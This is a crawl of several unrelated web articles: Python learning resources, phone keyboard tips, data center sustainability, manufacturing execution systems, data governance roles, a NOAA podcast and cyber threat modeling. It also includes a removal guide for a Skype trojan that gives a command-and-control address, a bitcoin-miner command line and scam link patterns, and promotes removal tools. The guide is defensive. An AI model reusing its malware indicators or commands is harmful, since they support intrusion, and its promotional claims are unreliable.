It’s all very basic, and very beginner friendly. There is community forums available for those who need help, but usually everything can be understood from within the dashboard you’re working with. You won’t need to install any tools, and the only thing you might need is a Notepad++ editor, to rewrite the code on your own computer – for gaining better understanding of it. It’s what I do, and I recommend it to everyone who wants to learn programming, be it Python or any other language. Udacity offers a great course at free of charge, for introducing yourself to the Python programming language and learning more about search engines, and how to build your own little web crawler. It certainly is a fun course to take part of, and it offers extensive guides and community support to help you along the way. You can enroll as premium student to receive guidance from the instructors, and gain a certificate by the end of the course – or you can start the free courseware to get going right away, unfortunately – the premium full course is at limited capacity, and so you have to signup for a waiting list. In total, there are 11 classes, all of which are thoroughly explained and documented. Go to the official page to learn more and find more answers to the questions you might have. Google itself is powered by a lot of Python code, and so it only makes sense that they support the community and want to help others learn the language. This is one of my favorite guides / classes I’ve ever viewed, it’s really detailed and the videos are very beginner friendly and also entertaining to watch. Just watch a couple of minutes of the first lecture above, to get a better sense of whether you like the instructor or not, and then perhaps start learning! The official Python Class page has all of the links to exercises and examples. Very similar to LPTHW, but offers a slightly more in-depth introduction on how to get your perfect setup up and running, and how to take the first steps so you don’t overwhelm yourself. It has been recognized as one of the best beginner guides for those who want to learn Python, definitely check it out and see the first few chapters to figure out whether you like the style of writing. Think Python is an introduction to Python programming for beginners. It starts with basic concepts of programming, and is carefully designed to define all terms when they are first used and to develop each new concept in a logical progression. Larger pieces, like recursion and object-oriented programming are divided into a sequence of smaller steps and introduced over the course of several chapters. You can find a lot of the example code by following this link, it’s one of the most professional books and have a strict “teaching you computer science” policy. It costs nearly $40 to purchase, but you can download the PDF and HTML versions for free, I’d definitely take advantage of this – if I was to learn Python from the beginning. You’d think that a site offering programming courses would know how to add a HTML title for their pages, lol. In all seriousness though, Learnstreet offers a great interactive programming course for learning Python, its beginner friendly as everything in this post is – and if you ever run into problems, its best to Google them. What I like about Learnstreet is the amount of hints / explanation you get with each of the exercises, right within the same dashboard that you write your code in. If you’re more like someone who likes to learn from video tutorials, I’m not sure there is anything as comprehensive as The New Boston video tutorial series for learning Python, and many other programming languages as can be seen on their YouTube channel. The only downside is that there is no real material for you to read or download, and it all comes in video format. I’m the type of programmer who cant withstand having to watch videos all the time, but that might clash with my opinion with the Google’s Python class – which was pretty sweet. This course is intended for people who have never programmed before. A knowledge of grade school mathematics is necessary: you need to be comfortable with simple mathematical equations, including operator precedence. You should also be comfortable working with simple functions, such as f(x) = x + 5. It should be completed with ten weeks, spending around ten hours of work on the tasks each week. If you’re able to find the time to do it, and not overwhelm yourself – I do recommend signing up and completing this course, it will only strengthen your knowledge, and it can be combined with any of the above mentioned resources for better understanding. Where to Learn Python? It turns out that I’ve tried most of these courses myself, I was actually hoping there would be more resources and links to add to the list, but we’ve just taken a look at all of the major ones and there is so much stuff and new things you’re going to be learning about. What is your experience with programming, and what are you looking to do with your newly found skills? I think that anyone who wants to build their expertise, should first acknowledge what they want to build and then work on that project until it gets done. The beauty of doing that is that you’ll learn specific things, and recreating similar projects will be much easier. Interactive platforms are cool, but they’re not yet ready to replace books or courses provided and narrated by professionals. I wish you the best of luck with learning Python, and please – if you’ve got any questions to ask, do so in the comment box.
<urn:uuid:fae91d21-2649-4642-8585-f0ab773d9b8d>
CC-MAIN-2024-38
https://www.lufsec.com/10-resources-to-learn-python-programming-language/
2024-09-09T18:29:56Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651133.92/warc/CC-MAIN-20240909170505-20240909200505-00432.warc.gz
en
0.960627
1,867
2.90625
3
Cut and paste, use speech-to-text, and access keyboard settings. INSTRUCTIONS & INFO To access the keyboard, tap on a Text entry field. Tap the Shift arrow key to capitalize the next letter entered. To enable Caps Lock, touch and hold the Shift arrow key. Tap the 1# icon to access symbols and numbers. Tap the Arrow keys to view more symbols. Tap the ABC key to return to the alphabet. Touch and hold a character key to access a list of characters associated with that key. The Suggestion bar will suggest alternate spellings to the last entered word if applicable. Tap a suggestion to replace the word in the text field. Note:Swiping up from under a suggested word will also replace a word with the word from the Suggestion bar. To move the cursor, touch and drag across the Space bar. To use Speech-to-text, tap the Microphoneicon. Speak now to use Speech-to-Text. To delete text, tap the Backspace key. To access emoticons, tap the Emoticon key. From the Emoticons screen, tap desired emoticon. To use Swype, touch and drag across each letter of the Desired word without removing the finger from the screen. To copy and paste text, tap and hold the Desired text. Touch and drag the Text Selection handles to highlight all the Desired text. Tap the Copy icon. In the Desired pasting location, tap and hold the Desired text field to place the cursor. Tap the PASTE icon. To access keyboard settings, tap and hold the Microphone icon. Tap the Settings icon. To customize the keyboard layout, tap Yes. Tap and drag the blue bar on the keyboard to resize. When you're satisfied with the keyboard layout, tap Done.
<urn:uuid:a26666ff-8866-41e1-9a13-23412e484a54>
CC-MAIN-2024-38
https://www.att.com/device-support/article/wireless/KM1298433/LG/G4H810
2024-09-17T03:04:51Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651722.42/warc/CC-MAIN-20240917004428-20240917034428-00732.warc.gz
en
0.799397
393
2.953125
3
Receive the latest articles and content straight to your mailbox Sustainability in Data Centers: What Makes a Data Center Sustainable? Sustainability has become a key consideration in data center design as more organizations adopt environmental, social, and governance (ESG) principles. Traditional data centers raise environmental concerns due to significant power and water consumption. Sustainable data centers use less of these resources, reducing environmental impacts and operational costs. What is a sustainable data center? Here’s a look at some of the terms, concepts, and strategies. Data Center Sustainability Concepts The overarching objective of data center sustainability is to minimize the facility’s environmental footprint. Several core concepts fall under that umbrella. ESG is a framework for assessing an organization’s operations in terms of ethical impact. From the organization’s perspective, it involves a strategy for maximizing environmental sustainability, fair treatment of workers, community engagement, ethical business practices, and risk management. Investors increasingly use ESG factors to evaluate corporate performance. Power usage effectiveness (PUE) measures how much energy is used by computing equipment versus cooling and other overhead. Created by The Green Grid, PUE is calculated by dividing the total energy a data center consumes by the amount used by the computing equipment. If the two numbers are equivalent — meaning that all energy goes to computing equipment — then the ratio will be 1.0. Also called greenhouse gas (GHG) accounting, carbon accounting measures the amount of GHG an organization produces in the course of its business activities. Direct emissions are those produced by sources the organization owns or controls, while indirect emissions are produced by resources the organization purchases. Net zero simply means cutting GHG emissions as close to zero as possible. It’s not the same as carbon-neutral, which involves offsetting carbon emissions and limiting future increases. Net zero emphasizes reductions in carbon emissions and using offsets as a last resort. As highlighted in our data center trends article, many organizations have set a goal of net zero emissions by 2050. Data Center Sustainability Strategies Data center operators apply these concepts using a number of sustainability strategies. It’s important to note that some strategies have benefits and drawbacks. Cooling accounts for almost 40 percent of a data center’s energy consumption. Aisle containment helps conserve energy by preventing the mixing of chilled and hot air, and effective airflow management helps ensure that cooling reaches equipment. Larger data centers are using water cooling, which reduces carbon emissions but consumes vast amounts of water. Recirculated water cooling uses less water than traditional evaporative techniques. Free cooling involves filtering and humidifying naturally cool outside air and only using mechanical cooling when the ambient air is too hot. Monitor and Measure It’s impossible to track sustainability improvements without data. Smart PDUs and other devices enable operations teams to establish baselines of power usage, temperature, and other metrics. Ongoing monitoring will show the effects of techniques such as consolidating servers, replacing legacy equipment, and reorganizing the data center layout. Measuring temperature at multiple points throughout the data center can help identify ways to reduce the thermal load. Consider Alternative Energy Sources Data centers can become more sustainable by switching to renewable energy or, if possible, generating primary or backup power onsite using hydrogen fuel cells. Nuclear power may one day be an option — emerging small modular reactors can generate 300 megawatts of electricity or more. Utilize Edge Computing Edge computing offers many performance benefits for enterprise networks, such as reduced latency and bandwidth use, but it can also help with sustainability initiatives. By reducing dependence on a centralized data center, edge computing can lower cooling requirements and associated energy expenditure. That’s just one example. We share more about edge computing and sustainability in another article. How Enconnex Is Addressing Data Center Sustainability At Enconnex, we take sustainability seriously. As an ISO 14001:2015-certified company, we’ve incorporated an environmental management system designed to minimize our carbon footprint into our day-to-day operations. Additionally, we offer an array of products designed to help data centers meet their sustainability objectives. For example, our new InfiniRack data center cabinet is designed to efficiently manage airflow, minimizing energy wasted on inefficient cooling. Contact one of our data center experts to discuss your needs and goals. Posted by Dave Bercovich on August 18, 2023 Dave has 20 years of data center and IT infrastructure sales experience. He has represented manufacturing organizations such as Avaya, Server Technology, & The Siemon Company. As Sales Director with Enconnex, he builds relationships and grows the Enconnex business working with partners, and resellers.
<urn:uuid:d2051f87-5dcd-4b3d-859e-9ca88ce0f7bc>
CC-MAIN-2024-38
https://blog.enconnex.com/data-center-sustainability
2024-09-19T14:52:06Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652031.71/warc/CC-MAIN-20240919125821-20240919155821-00532.warc.gz
en
0.910611
962
3.28125
3
Applications that track and document the transformation of raw material through a production pipeline to finished products are known as manufacturing execution systems, or MES. These systems notably monitor and track the production lifecycle, while other applications will handle aspects of the product life cycle. The production lifecycle is typically contained to shop floor operations, where manufacturing is ongoing. In today's modern, IIoT (Industrial Internet of Things) world, MES integrates through IIoT with devices, like sensors, instruments, robots, machines, and other networked devices. The main purpose of an MES is to enhance the management and control features for administrators and leverage automation to optimize production. Beyond this, supplying its data and analysis, MES can integrate with several other systems at various levels, like enterprise resource planning (ERP) software, used to supply top level resource planning analysis, or supervisory control and data acquisition (SCADA), used to help manage industrial processes controls and data in larger operations. Manufacturing execution systems (MES) and enterprise resource planning (ERP) software are not alternatives for each other. Simplistically, an ERP manages stocks, while an MES manages the pipeline from raw materials to manufactured goods. Three main points differentiate ERP systems from MES systems: - Functionally ERP and MES fill complementary but different roles within the manufacturing plant. While ERP focuses on overall quantitative analysis and scheduling, the MES focuses on the shop floor operations. - Because their functional domains are different, both ERP and MES integrate into the larger plant system differently. ERPs are top level, and draw their data from other application sources, like CRMs. MES integrates directly in the machines and devices used in the industrial line, or through IIoT. - Data captured in time is another difference. MES are real-time, collecting data directly from devices and machines. ERPs will perform periodic data analysis, drawing from multiple sources across the business to generate hourly, monthly, quarterly reports and more. More detailed key distinctions between ERPs and MES functionality include: - ERP systems mostly address pre-production issues as well as post-production analysis, with may entail - Product strategy - Reference product information - Production demand - Master data - Bills of materials (BOMs) - Standard operating procedures (SOPs) - Change orders - Contrastingly, manufacturing execution systems must have the capacity to anticipate, align and adjust production and business parameters in real-time. MES also manage the data generated during and just after production, such as: - Resource usage (labor, equipment, materials) - Order and work-in-progress (WIP) status - As-built genealogy yields - Time events - Machine throughput - The complementary nature of MES and ERP functionality allows manufacturing companies to integrate these systems and reap numerous benefits: - Increased overall equipment efficiency (OEE) - Reduced cycle times - Reduced data entry - Data consistency - Leaner manufacturing - More on-time delivery Some confusion develops around the industrial internet of things (IIoT) and manufacturing execution systems. MES applications have been in use since the 1990s, and in the wave of modern industrial smart technology adoption, IIoT has become synonymous with industrial automation, and Industry 4.0, spurring the notion that MES has been replaced. To clarify, the Industrial Internet of Things (IIoT) and manufacturing execution systems (MES) work together to provide a complete picture of a manufacturer’s floor operations. For many business benefits, data analysis has been recognized as a fundamental requirement in modern manufacturing. For instance, to perform tasks like root cause analysis, large quantities of data are needed. IIoT gathers much of this data, like contextual details from devices, sensors, machines and controllers. The MES combines the data from IIoT with its own context, like customer details, orders, products, recipes, billings, etc., to complete the total picture of operations within the wall of the factory. While both IIoT and MES collect data, the MES, in conjunction with team members, owns the domain of analysis and determination of situational changes in the ongoing manufacturing process. This means, installing just an IIoT will provide a communications backbone between and among devices, but it will not include the analytical brain to compile the context. IoT (Internet of Things) platforms layer multiple technologies that provision and manage connected devices on an IoT network. IoT platforms are somewhat associated with consumer products, like those found in smart homes. Operating in industrial settings, IIoT (Industrial Internet of Things) platforms function similarly to IoT platforms, but with more advanced features. The advanced features serve the specific needs of an industry. For shipping and physical storage, this may come in the form of robots that move products around a warehouse. Industrial cases are highly complex, with thousands to millions of connected devices that require powerful and robust platforms to effectively manage them. MES platforms can be imagined as a layer on top of IoT and IIoT platforms. This layer, while not a management layer, effectively extends the information analytics pipeline that can be connected from the device on the shop floor up through business insights and decision making applications. In advanced cases like IIoT, decisions can be automatically relayed to shop floor devices for corrective actions, changes in scheduling, anticipation of materials, etc. Manufacturing execution systems (MES) and Industrial Internet of Things (IIoT) are brought together under the popular umbrella term Industry 4.0. IIoT is essentially the foundation of all smart manufacturing. Acting as a backbone, IIoT makes it possible for sensors, devices, machines, robots, controllers, databases, and information systems to communicate between each other. Because of this, IIoT was thought to replace MES as a device facing system. MES has not been replaced, instead, it has embraced IIoT and now adds much greater value as a data context system. MES integrates with IIoT to improve data analysis, and root-cause analysis. IIoT collects data from sensors, devices, robots, controllers, etc., and provides that data to the MES which, possibly linked to other data systems like ERP, can add greater context to the IIoT data. By analyzing device data with details on customers, orders, bills of materials, etc. a complete and useful picture of data can be created. This data context is important in the manufacturing environment where orders, materials, schedules, and more can rapidly change. Manufacturing teams rely on MES to make sense of and error-proof data through rules enforcement. This means that if a specific quantity of material is to be used, only that amount is allotted. Same goes for equipment, the types of tasks, and in what order. While the IIoT collects data on these processes, the manufacturing execution systems ensures their accuracy. Manufacturing execution systems are complex applications that help manufacturers improve visibility into their operations as well as enhance their ability to control and manage them. Several other key and incidental benefits stem from these systems. - Improved Management And Control — MES enhances visibility into the entire production lifecycle, while adding controls and analysis, ultimately improving quality. - Automated Regulatory Compliance — Compliance is complex to maintain. Leveraging compute and automation functions at the point of work, namely the plant floor, and integrating into the larger company systems, like enterprise resource planning (ERP) platforms, off loads that work from humans to machines, making data organization easier. Organized data means compliance becomes manageable and turns from a burden into a strength. - Fast And Accurate Reporting — High level leadership, concerned with business level issues, needs to look at a different analysis than those in operations, who need details of the factory line. MES systems are able to analyze data for digestion at multiple levels, feeding the right information to the right users. - Increased Visibility And Efficiency — MES platforms provide centralized dashboards with relevant real-time information about factory floor operations. Operational visibility reveals inefficiencies like where there are bottlenecks, and identifies incidents as they happen. - Reduced System Costs — From operational visibility stems costs transparencies where direct intervention can have positive impacts on the bottom line. - Improved MES Supply Chain Collaboration — Integrating MES into inline supply chain information systems enables data sharing that can contribute to greater supply chain efficiencies. Further, as value chain and supply chain entities grow in cooperation, greater value can be passed down to customers. The core features found in manufacturing execution systems (MES) software help companies improve the quality and productivity of their production lines. MES core areas include resource allocation, shop floor management, production scheduling, production monitoring, data collection and analysis. Within these areas, MES systems must be able to perform the following functions. - Build schedules and execute production plans - Effectively allocate human and material resources - Provide information about plans and task details to shop floor workers during production - Visualize shop floor layout, workstations, and equipment - Visually monitor in real-time the movements of materials and personnel on the shop floor - Track equipment performance through SCADA system integrations - Assist identifying potential production bottlenecks and issues - Present reports, dashboards, and analytics and track output, utilization, and performance Software that is related to MES include: - ERP Systems - CAD & PLM Software - Quality Management Systems (QMS) - Asset Management Software - Supply Chain Management Software (SCM)
<urn:uuid:889b053b-6d98-46f0-999b-62f082305c26>
CC-MAIN-2024-38
https://www.hitachivantara.com/en-us/insights/faq/manufacturing-execution-systems
2024-09-20T21:01:58Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701423570.98/warc/CC-MAIN-20240920190822-20240920220822-00432.warc.gz
en
0.920195
1,992
2.703125
3
Data governance is essential in today’s fast-paced, highly competitive organizational world. With the ability to acquire large volumes of heterogeneous internal and external data, companies require a discipline to maximize value, manage human risks and errors, and cut costs. Data governance guarantees that data is consistent, trustworthy, and not misused. As companies face new data privacy regulations, it’s important to have data analytics in place. Data analytics can help businesses optimize their operations and make business decisions. A data governance program that is designed well usually includes a governance team, a steering body that acts as the governing body, and a group of data stewards. They collaborate to develop data governance standards and policies, as well as implementation and enforcement methods that data stewards generally carry out. Why is data governance important? Data is undoubtedly an organization’s most valuable asset. Data governance ensures that data is usable, accessible, and secure. Effective data governance results in enhanced data analytics, which leads to better decision-making and operational support. It also helps to avoid data inaccuracies or discrepancies, which can lead to a variety of organizational challenges — including poor decision-making and integrity problems. Data governance is also critical for regulatory compliance, ensuring that firms consistently meet all levels of regulatory obligations to avoid facing major financial issues. In fact, in 2021 JP Morgan was fined $125 million for violations in compliance control, mostly due to inadequate data and records keeping. In 2022, Morgan Stanley was fined a total of $60 million for data privacy violations that occurred between 2016 and 2019, resolving civil fines as well as a class action lawsuit over defunct data center equipment that had not been properly erased. This is why a data governance strategy is more than just a plan. To implement a successful data governance program, significant roles and duties are required. This is essential for decreasing risks and operational expenses. The three most important data governance roles Data governance is a collaborative activity with roles that are distinct yet interconnected. The three most critical roles that any business must understand in the context of data governance are as follows: The data owner is in charge of the data in a certain data domain. A data owner must guarantee that the information inside that domain is correctly maintained across various platforms and business processes. Data owners are frequently represented on the executive committee as voting members or attending members with no voting powers. The following are their specific responsibilities: Approving data glossaries and definitions Ensuring the accuracy of information utilized inside and beyond the organization Supervising operations that are directly relevant to data quality Evaluating and approving the Master Data Management (MDM) strategy, outcomes, and actions Working with other data owners to resolve data issues and misconceptions across business units Second-level evaluation of data concerns highlighted by data stewards Providing feedback to the higher-ups on software solutions, policy, or regulatory requirements that may affect the data owner’s data domain. Senior staff is frequently assigned the job of the data owner. For example, the finance director may be the data owner of the organization’s financial data. However, due to this degree of seniority, a data owner is frequently unable to participate in activities aimed at controlling data quality on a daily basis. Because data ownership is frequently not a full-time profession, the data owner is usually assisted by one or more data stewards. The primary distinction between a data owner and a data steward is that the data steward is in charge of managing the quality of the defined datasets on a daily basis. The data steward is the Subject Matter Expert (SME) who understands and explains the importance of the information and its use. The data steward also provides insight into the general purposes of the data to the data owner, but will be heavily involved in the intricacies of how these objectives might be realized. A data steward frequently works with other stewards within an organization through a data steward council. This decision-making body weighs choices on potential data concerns and devises remedies. In most talks, the data steward represents the data owner. If the Data Steward Council cannot agree on how to fix a data problem, this individual will return to the data owner and/or the Steering Committee. Other responsibilities of the data steward include: Creating data definitions and describing allowed values Defining rules for data generation, data usage, or data derivatives Recognizing and documenting current and desired data systems And establishing data quality objectives Some organizations have established official data steward roles, which are frequently filled by personnel within the business line who have been designated for such responsibilities. Other organizations provide data stewardship tasks to individuals who also have other duties. A successful data steward, regardless of how the role is defined, will adhere to the pre-established data definitions, detect data quality issues, and verify that the business adheres to the set standard. A data custodian is responsible for developing and maintaining security safeguards for specific data collection in order to fulfill the Data Governance Framework standards established by the data owner. Many individuals mix up data custodians with data owners. This is most likely due to the fact that data custodians are frequently the ones that physically or directly handle the storage and security of a data collection. However, simply because data is kept on a device that someone controls does not make them the data owner. A data owner is a person who is generally in a senior company position, responsible for the categorization, protection, usage, and quality of one or more data sets. Data custodians are IT professionals who manage the security and storage infrastructure of one or more data sets according to an organization’s data governance policies. In small businesses where the same person may hold the responsibilities of the data owner and data steward, the data owner is likely to outsource day-to-day activities to data custodians directly. Data masters: a must for data-driven organizations Data governance adds meaning and security to an organization’s data by allowing teams to organize, record, and assess the quality of existing information assets. Data governance ensures that all colleagues have the context they need to trust data, access data, and produce important insights by defining terminology, setting policies, assigning duties, and more. Each of the mentioned roles is an essential component of a well-managed data governance organization. However, the organization’s MDM maturity determines who is the best fit for these jobs in an organization, and how these roles interact with one another. Data alone does not solve issues or generate value; efficient data management and application do. Unsystematic methods of data management may easily transform data into a burden rather than a benefit for a business. Implementing a system with clear roles and responsibilities, such as data owners, stewards, and custodians is critical for effective data governance. Data governance is more than just an option Organizations now have massive volumes of data about their customers, clients, suppliers, patients, workers, and other stakeholders. An organization with solid data masters will be more successful, as the information will be used more correctly to understand the market and its target audience better. The same data governance will guarantee that your organization’s data is trustworthy, well-documented, easy to discover and access, safe, compliant, and confidential. Communication skills are essential for all of these professions, especially data masters. Every function must be able to articulate its own ideas, pain points, recognized risks and difficulties, business requirements, and ambitions. Of course, there will always be competing goals, as well as different interpretations of business terms, different applications of data, and so on, but that’s where data governance and masters come in. Make sure your business is well-positioned and well-governed to optimize data governance efforts while minimizing the risk of data breaches.
<urn:uuid:42c98290-8026-4deb-ae7f-e9fb22e018be>
CC-MAIN-2024-38
https://www.cpomagazine.com/cyber-security/data-owners-vs-data-stewards-vs-data-custodians-the-3-types-of-data-masters-and-why-you-should-employ-them/
2024-09-11T02:56:00Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651343.80/warc/CC-MAIN-20240911020451-20240911050451-00496.warc.gz
en
0.943221
1,597
2.59375
3
The environmental agency collects vast amounts of data each day from its constellation of satellites. The National Oceanic and Atmospheric Administration is charged with predicting changes in climate, weather, oceans and coasts, then sharing that information with the masses. In executing that integral mission, NOAA’s weather and climate measurements ultimately end up as the basis for forecast models millions of Americans consult through weather apps on their mobile devices. Much of that data—tens of terabytes each day of it, actually—come from NOAA’s weather satellite constellations. Satellites in the Joint Polar Satellite System, or JPSS, circle the Earth 14 times each day from pole to pole, using instruments to take measurements of atmospheric conditions, such as land and sea surface temps, rainfall rates, snow and ice cover and even fire locations and smoke plumes. NOAA’s Geostationary Operational Environmental Satellites, or GOES, program provides advanced imagery and measurements of the Earth’s Western Hemisphere more than 22,000 miles above the equator. In addition, the GOES satellites provide lightning mapping data and monitor solar activity and space weather. In this episode of Critical Update, we sat down with NOAA Satellite Scientist Jim Yoe to discuss the agency’s space presence, and how its satellites collect and share important weather and climate measurements that impact millions of people each day. You can listen to the full episode below or download and subscribe to Critical Update in Apple Podcasts or Google Play.
<urn:uuid:e0320e67-7107-4a51-9195-c218dc38ee1b>
CC-MAIN-2024-38
https://www.nextgov.com/podcasts/2022/08/information-constellation-how-noaa-data-ends-forecasts/376126/?oref=ng-next-story
2024-09-11T04:42:59Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651343.80/warc/CC-MAIN-20240911020451-20240911050451-00496.warc.gz
en
0.890559
309
3.515625
4
The global biomass power generation market is projected to reach USD 105.7 billion by 2028 from an estimated USD 91.3 billion in 2023, at a CAGR of 3.0% during the forecast period. The biomass power generation market refers to the industry involved in producing electricity from organic materials such as wood, agricultural residues, animal waste, and dedicated energy crops. Biomass power generation typically involves burning these organic materials to produce steam, which then drives turbines to generate electricity. The Biomass Power Generation Market is poised for substantial growth in the coming years, driven by several key factors: These factors collectively contribute to a favorable outlook for the biomass power generation market, with substantial growth expected in the coming years as the world transitions towards a more sustainable and low-carbon energy future. To know about the assumptions considered for the study download the pdf brochure Renewable Energy Imperative: Nations worldwide are fervently committed to amplifying their renewable energy portfolios, recognizing biomass as a dependable ally in the battle against climate change. Governmental Backing: With governments offering a slew of incentives and subsidies, the allure of biomass power projects has never been stronger. From lucrative feed-in tariffs to enticing tax breaks, policymakers are fueling investor interest. Technological Innovation: The relentless march of technological progress is propelling biomass power generation into a new era of efficiency and cost-effectiveness. Cutting-edge combustion methods and advanced biofuel production techniques are reshaping the landscape. Sustainable Waste Management: Biomass power plants aren't just powerhouses; they're eco-warriors, turning organic waste into clean energy. By diverting agricultural and municipal waste from landfills, they're combating greenhouse gas emissions head-on. Energy Independence: Biomass resources, often abundant locally, offer a beacon of energy independence, reducing dependence on imported fossil fuels and bolstering national security. Seamless Integration: Biomass power generation seamlessly integrates with existing infrastructure, offering a smooth transition to renewables. Whether co-firing with coal or retrofitting existing plants, the path to sustainability is clear. Environmental Champions: As carbon-neutral power producers, biomass plants are leading the charge in environmental stewardship. By harnessing organic materials that would otherwise emit greenhouse gases, they're making significant strides in the fight against climate change. Biomass Power Generation Market by Technology (Combustion, Gasification, Anaerobic Digestion, Pyrolysis), Feedstock (Agricultural Waste, Forest Waste, Animal Waste, Municipal Waste), Fuel (Solid, Liquid, Gaseous) and Region - Global Forecast to 2028
<urn:uuid:1def3b52-d0a1-42d5-98b6-0540ac410fdd>
CC-MAIN-2024-38
https://www.marketsandmarkets.com/ResearchInsight/size-and-share-of-biomass-power-generation-market.asp
2024-09-07T14:31:06Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650883.10/warc/CC-MAIN-20240907131200-20240907161200-00896.warc.gz
en
0.914632
542
2.703125
3
Skype virus is a trojan, distributed through Skype network only. This trojan is spread via Skype. This is how it works. A victim receives a message containing a link sent by one of his (her) Skype friends. The message might mention your name and look real. All of the infected persons friends using Skype receive one. The most victimised are the users of the following countries: Italy, Russia, Poland, Costa Rica, Spain, Germany and Ukraine. However, the list of the countries, which users can be affected, is not limited, meaning you yourself can become the victim of this trojan virus as well. On an interesting note, the installer of the virus is downloaded from a server located in India. About Skype Virus Skype virus is not a single malware, but a group of parasites, made by different scammers for close than 10 years. The first version of such malware was launched around 2008 and new attacks happen all the time. The concept is not new : chat viruses plagued other platforms like ICQ, MSN, Aim or IRC. Skype Virus works in one of several possible ways - Trojan steals passwords and exploit the victim’s skype to send malicious links to his (her) friends and, thus, spread itself further. - It attaches itself to skype process without stealing password and uses it to send out spam. Both versions try to modify and delete chats from the contacts that were spammed, so they can continue to do that for longer. Statistics provided by goo.gl and bit.ly URL shorteners show that these links are clicked around 12,000 times an hour. Thus, we may regard Skype virus a very successful social engineering scam. Interestingly enough, the malevolent link can even be sent from inactive accounts. When the link has been clicked on, a .zip file (it can also be a .scr file) is being downloaded onto your computer’s system. Inside the .zip file there is the .exe file, which is the executable file of Skype Trojan virus. After it has been executed, your machine is infected with the virus. Skype virus installs other pieces of malware onto the victim’s computer system. The source of these malicious downloads is the Hotfile.com service. The malware’s C&C (Command and Control) server is located in Germany. Its IP address is 18.104.22.168:9000. One of the malign installs is a Bitcoin generator. The latter tool produces bitcoins, a cryptography-based digital currency. It is run by the command bitcoin-miner.exe -a 60 -l no -o http://suppp.cantvenlinea.biz:1942/ -u [email protected] -p XXXXXXXX (the letter X covers the personally identifiable information). This process requires a lot of the resources of the CPU (Central Processing Unit), which, in turn, make your computer run at an extremely slow pace. This can even take up to 90 per cent and, even, more usage of CPU. Because of the degraded performance of your device and due to the other dangerous applications, which have entered your computer’s system, you need to scan your computer with an antivirus utility, such as Malwarebytes, for instance. Another possibilities are other types of malicious payloads : keyloggers, spam viruses or ransomware. This depends on what pays out the most for malware makers. How Has Skype Trojan Infected Your PC? Most probably, you have received a message with a link from one of your friends on Skype. In fact, it was not a message sent from a friend of yours on Skype, but a scam message containing a malicious link coming from the developers of the malicious program, namely, Skype virus. The text of the message should have been something like, Look, This is a very nice photo of you, This is my favorite picture of you, Your photo isn’t that great or I don’t think I will ever sleep again after seeing this photo, etc., followed by a link to a bogus FaceBook, Twitter, Google+ or Pinterest website. The message can vary in each particular case but the purpose of it is exactly the same – it is written so that you followed the provided link. The instance of the link accompanying the message is: http://goo.gl/XXX?image=imgXXX.jpg or http://bit.ly/XXXX. When the link has been clicked on, it does not show any photo, but redirects to a scam site. The malicious program codes, running on that website, infects the user’s computer with Skype Trojan along with other malicious modules. Skype Trojan virus and its programs installed on your computer can be removed by running a full system scan with one of the following professional security scanners: Spyhunter or Hitman. As we have just revealed, this is a complex infection, thus, automatic tools are recommended to be utilized. After cleaning PC it is critically important to change Skype password. Automatic Malware removal tools
<urn:uuid:c783d147-9970-4200-b0c1-df5a431ec5c4>
CC-MAIN-2024-38
https://www.2-viruses.com/remove-skype-virus
2024-09-08T19:52:28Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651017.43/warc/CC-MAIN-20240908181815-20240908211815-00796.warc.gz
en
0.930556
1,044
2.796875
3
Cyber threat modeling aims to answer the fundamental question: “What potential security threats and vulnerabilities exist within this system, and what measures can we implement to mitigate these risks effectively?” The process of threat modeling typically involves several key steps, each of which plays a crucial role in understanding and mitigating security risks: - Define the Scope: Begin by defining the scope of the threat modeling exercise. This involves identifying the system or application under analysis, including its boundaries, components, and interfaces with external entities. Understanding the scope helps focus the threat modeling efforts on the most critical areas. - Identify Assets: Identify the assets within the scope of the system that need to be protected. These assets can include sensitive data, software components, hardware devices, networks, and other valuable resources to the organization and could be targeted by attackers. - Understand the Architecture: Gain a deep understanding of the system’s architecture, including its design, functionality, data flows, and dependencies. This step involves analyzing architectural diagrams, system documentation, and other relevant artifacts to identify potential attack surfaces and weak points in the system. - Identify Threats: Brainstorm and identify potential threats to the system’s security. Threats can come from various sources, including malicious actors, technical vulnerabilities, insider threats, natural disasters, or human error. Consider both known threats based on past experiences and potential new threats that may arise. - Assess Risks: Assess the risks associated with each identified threat by considering factors such as the likelihood of occurrence, the potential impact on the system, and the effectiveness of existing security controls. Prioritize risks based on their severity and likelihood to focus mitigation efforts on the most critical areas of concern. - Mitigate Risks: Develop and prioritize mitigation strategies to address the identified risks and vulnerabilities. This may involve implementing security controls, applying best practices, redesigning system components, updating policies and procedures, or providing security awareness training to users. - Validate and Review: Validate the effectiveness of the mitigation strategies through testing, review, and validation. This step involves conducting security assessments, penetration testing, code reviews, and other validation activities to ensure the implemented security controls effectively mitigate the identified risks. - Document and Communicate: Document the findings of the threat modeling process, including identified threats, assessed risks, and mitigation strategies. Communicate the results to stakeholders, including developers, system architects, security professionals, and business leaders, to raise awareness of security risks and ensure buy-in for the proposed mitigation measures. Threat modeling methodologies should be viewed as an ongoing and iterative process, with regular reviews and updates to adapt to evolving threats and changes in the system environment. Please login or Register to submit your answer
<urn:uuid:f718a386-c920-4d84-baed-0bb593633d7e>
CC-MAIN-2024-38
https://www.centraleyes.com/question/what-are-the-main-steps-in-the-threat-modeling-process/
2024-09-08T19:36:09Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651017.43/warc/CC-MAIN-20240908181815-20240908211815-00796.warc.gz
en
0.925112
559
2.765625
3
